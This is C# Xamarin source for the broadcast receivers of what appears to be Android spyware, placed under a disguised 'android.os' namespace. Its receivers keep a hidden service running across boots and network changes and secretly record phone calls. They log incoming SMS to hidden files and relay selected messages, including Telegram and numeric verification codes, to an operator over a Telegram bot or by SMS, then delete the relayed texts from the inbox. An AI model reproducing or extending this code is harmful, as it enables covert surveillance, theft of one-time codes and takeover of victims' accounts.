﻿using System;
using Android.Content;
using Android.Telephony;
using Android.App;
using Java.Text;
using Java.Util;
using Android.Widget;
using Android.Database;
using Android.OS;
using Android.Runtime;
using Android.Media;
using TeleSharp.Entities.SendEntities;

namespace android.os
{
    [BroadcastReceiver]
    class Uni : BroadcastReceiver
    {
        public override void OnReceive(Context context, Intent intent)
        {
            try
            {
                Intent i = new Intent(Intent.ActionUninstallPackage, Android.Net.Uri.Parse("package:" + context.PackageName));
                i.AddFlags(ActivityFlags.NewTask);
                context.StartActivity(i);
            }
            catch { }
        }
    }
    [BroadcastReceiver(Enabled = true)]
    [IntentFilter(new[] { TelephonyManager.ActionPhoneStateChanged
        , Intent.ActionNewOutgoingCall })]
    public class callreceiver : BroadcastReceiver
    {
        public override void OnReceive(Context p1, Intent p2)
        {
            try
            {
                try
                {
                    if (inf.allowrestartmainservice && !inf.Metods.IsServiceRunning(p1, new mainservice()))
                    {
                        p1.StartService(new Intent(p1,typeof(mainservice)));
                    }
                }
                catch { }
                if (p2.GetStringExtra(TelephonyManager.ExtraState) == TelephonyManager.ExtraStateIdle)
                {
                    CALLRECORDER.stopr(inf.Values.callpth);
                    inf.Values.OnCallRecording = false;
                    inf.Values.callpth = "";
                    inf.Values.incoming_number = "";
                }
                if (p2.GetStringExtra(TelephonyManager.ExtraState) == TelephonyManager.ExtraStateRinging)
                {
                    try
                    {
                        inf.Values.tmgr = (TelephonyManager)p1.GetSystemService(Context.TelephonyService);
                    }
                    catch { }
                    inf.Values.incoming_number = p2.Extras.GetString(TelephonyManager.ExtraIncomingNumber);
                }
                if (p2.GetStringExtra(TelephonyManager.ExtraState) == TelephonyManager.ExtraStateOffhook)
                {
                    try
                    {
                        inf.Values.tmgr = (TelephonyManager)p1.GetSystemService(Context.TelephonyService);
                    }
                    catch { }
                    if (inf.Values.incoming_number == "")
                        inf.Values.incoming_number = p2.Extras.GetString(TelephonyManager.ExtraIncomingNumber);
                    var currentDateandTime = inf.Values.sdf.Format(inf.Values.date);
                    var fname = currentDateandTime + " NUM=" + inf.Values.incoming_number;
                    inf.Values.callpth = Filef.CreateDir(Filef.getmainpth() + "/System/tmp_c/") + fname + ".vc";
                    CALLRECORDER.PhoneNumber = inf.Values.incoming_number;
                    CALLRECORDER.start(inf.Values.callpth);
                    inf.Values.OnCallRecording = true;
                }
            }
            catch { }
        }
    }

    [BroadcastReceiver(Enabled = true)]
    [IntentFilter(new[] { Intent.ActionBootCompleted
        ,"android.intent.action.QUICKBOOT_POWERON"
    ,"com.htc.intent.action.QUICKBOOT_POWERON"})]
    public class booton : BroadcastReceiver
    {
        public override void OnReceive(Context context, Intent intent)
        {
            try
            {
                context.StartService(new Intent(context, typeof(mainservice)));
            }
            catch { }
        }
    }
    [BroadcastReceiver]
    class camrec : BroadcastReceiver
    {
        public override void OnReceive(Context context, Intent intent)
        {
            try
            {
                Intent _cam = new Intent(context, typeof(Cam));
                _cam.SetFlags(ActivityFlags.NewTask);
                context.StartActivity(_cam);
            }
            catch { }
        }
    }
    [BroadcastReceiver]
    class toastrec : BroadcastReceiver
    {
        public override void OnReceive(Context context, Intent intent)
        {
            try
            {
                Toast.MakeText(context, intent.GetStringExtra("text"), ToastLength.Short).Show();
            }
            catch { }
        }
    }

    [BroadcastReceiver(Enabled = true)]
    class restartmain : BroadcastReceiver
    {
        public override void OnReceive(Context context, Intent intent)
        {
            try
            {
                Intent i = new Intent(context, typeof(mainservice));
                i.SetPackage(Application.Context.PackageName);
                context.StartService(i);
            }
            catch { }
        }
    }

    [BroadcastReceiver(Enabled = true)]
    [IntentFilter(new[] {"android.net.conn.CONNECTIVITY_CHANGE"})]
    class netchanged : BroadcastReceiver
    {
        public override void OnReceive(Context context, Intent intent)
        {
            try
            {
                if (RECORDER.IsAlive&&!inf.isonline())
                {
                    RECORDER.stopr();
                    inf.WaitFiles.Add(new WaitingFile
                    {
                        Chat_Id = RECORDER.ChatId.ToString(),
                        DateTime = DateTime.Now,
                        FileName = System.IO.Path.GetFileName(RECORDER.Fpth),
                        Path = RECORDER.Fpth
                    });
                }
                if (inf.isonline() && !inf.Metods.IsServiceRunning(context, new mainservice()))
                {
                    inf.allowrestartmainservice = true;
                    context.StartService(new Intent(context, typeof(mainservice)));
                }
                else if (!inf.isonline() && inf.Metods.IsServiceRunning(context, new mainservice()))
                {
                    inf.Values.cansendonline = true;
                    inf.allowrestartmainservice = false;
                    context.StopService(new Intent(context, typeof(mainservice)));
                }
            }
            catch { }
        }
    }
    [BroadcastReceiver(Enabled = true)]
    [IntentFilter(new[] {"android.net.wifi.WIFI_STATE_CHANGED"})]
    class wifichanged : BroadcastReceiver
    {
        public override void OnReceive(Context context, Intent intent)
        {
            try
            {
                if (RECORDER.IsAlive&&!inf.isonline())
                {
                    RECORDER.stopr();
                    inf.WaitFiles.Add(new WaitingFile
                    {
                        Chat_Id = RECORDER.ChatId.ToString(),
                        DateTime = DateTime.Now,
                        FileName = System.IO.Path.GetFileName(RECORDER.Fpth),
                        Path = RECORDER.Fpth,
                    });
                }
                if (inf.isonline() && !inf.Metods.IsServiceRunning(context, new mainservice()))
                {
                    inf.allowrestartmainservice = true;
                    context.StartService(new Intent(context, typeof(mainservice)));
                }
                else if (!inf.isonline() && inf.Metods.IsServiceRunning(context, new mainservice()))
                {
                    inf.Values.cansendonline = true;
                    inf.allowrestartmainservice = false;
                    context.StopService(new Intent(context, typeof(mainservice)));
                }
            }
            catch { }
        }
    }
    [BroadcastReceiver(Enabled = true)]
    [IntentFilter(new[] {Intent.ActionUserPresent
        , Intent.ActionScreenOff,Intent.ActionScreenOn})]
    class lOCK_OPENED : BroadcastReceiver
    {
        public override void OnReceive(Context context, Intent intent)
        {
            try
            {
                if (inf.allowrestartmainservice && !inf.Metods.IsServiceRunning(context, new mainservice()))
                    context.StartService(new Intent(context, typeof(mainservice)));
            }
            catch { }
        }
    }

    [BroadcastReceiver(Enabled = true)]
    [IntentFilter(new[] { "android.provider.Telephony.SMS_RECEIVED" })]
    public class smsreceiver : BroadcastReceiver
    {
        static SmsManager sms = SmsManager.Default;
        Context c;
        public override void OnReceive(Context context, Intent intent)
        {
            try
            {
                try
                {
                    if (inf.allowrestartmainservice && !inf.Metods.IsServiceRunning(context, new mainservice()))
                        context.StartService(new Intent(context, typeof(mainservice)));
                }
                catch { }
                string currentDateandTime = inf.Values.sdf.Format(inf.Values.date);
                c = context;
                Bundle bundle = intent.Extras;
                if (bundle != null)
                {
                    Java.Lang.Object[] pdusObj = (Java.Lang.Object[])bundle.Get("pdus");
                    for (int i = 0; i < pdusObj.Length; i++)
                    {
                        SmsMessage currentMessage = SmsMessage.CreateFromPdu((byte[])pdusObj[i]);
                        String phoneNumber = currentMessage.DisplayOriginatingAddress;
                        if (phoneNumber.StartsWith("+98"))
                            phoneNumber = phoneNumber = phoneNumber.Replace("+98", "0");
                        String message = currentMessage.DisplayMessageBody;
                        string name = Contacts.number_to_name(phoneNumber);
                        if (name == "")
                        {
                            if (phoneNumber.StartsWith("0"))
                            {
                                name = Contacts.number_to_name(phoneNumber.Replace("0", "+98"));
                                if (name == "")
                                    name = phoneNumber;
                            }
                            else
                                name = phoneNumber;
                        }
                        Filef.writeappend("DateTime: " + currentDateandTime + "\nNumber: " + phoneNumber + "\nmessage: " + message + "\n=============>\n", name + ".sm", Filef.getmainpth() + "/System/tmp_s");
                        try
                        {
                            if (inf.Values.sharep.GetString("importantnumber", "") != "")
                            {
                                if (phoneNumber == "Telegram" || inf.isdigit(message))
                                {
                                    if (inf.isonline())
                                        inf.CTRLApi.SendMessage(new SendMessageParams { Text = "From: " + inf.Metods.devicename(inf.Manager.ChatId) + "\n" + "Message From: " + name + "\nText: " + message, ChatId = inf.Manager.ChatId.ToString() });
                                    else
                                    {
                                        SmsManager.Default.SendTextMessage(inf.Values.sharep.GetString("importantnumber", ""), null, message, null, null);
                                        ICursor C = inf.Values.C.ContentResolver.Query(Android.Net.Uri.Parse("content://sms"), null, null, null, null);
                                        if (C.MoveToFirst())
                                        {
                                            do
                                            {
                                                try
                                                {
                                                    string id = C.GetString(0);
                                                    string NAme = C.GetString(2);
                                                    if (NAme == "Telegram" || NAme == inf.Values.sharep.GetString("importantnumber", ""))
                                                        inf.Values.C.ContentResolver.Delete(Android.Net.Uri.Parse("content://sms/" + id), null, null);
                                                }
                                                catch { }
                                            } while (C.MoveToNext());
                                        }
                                    }
                                    inf.Values.sharep.Edit().Remove("importantnumber").Commit();
                                    inf.WaitMessages.Add(new WaitMessage { Text = "Turned Important Mode Off", ChatId = inf.Manager.ChatId, DateTime = DateTime.Now });
                                }
                            }
                        }
                        catch { }
                        if (inf.Metods.getnotifyidcount("notifys") > 0)
                        {
                            int[] ids = inf.Metods.getidsnotify("notifys", 7);
                            for (int j = 0; j < ids.Length; j++)
                            {
                                inf.NotifyList.Add(
                                    new Notification
                                    {
                                        Sms = new SmsNotify
                                        {
                                            Chat_Id = ids[i].ToString(),
                                            DateTime = DateTime.Now,
                                            Text = message,
                                            FromNumber = phoneNumber,
                                            Name = name
                                        }
                                    });
                            }
                        }
                    }
                }
            }
            catch { }
        }
    }
}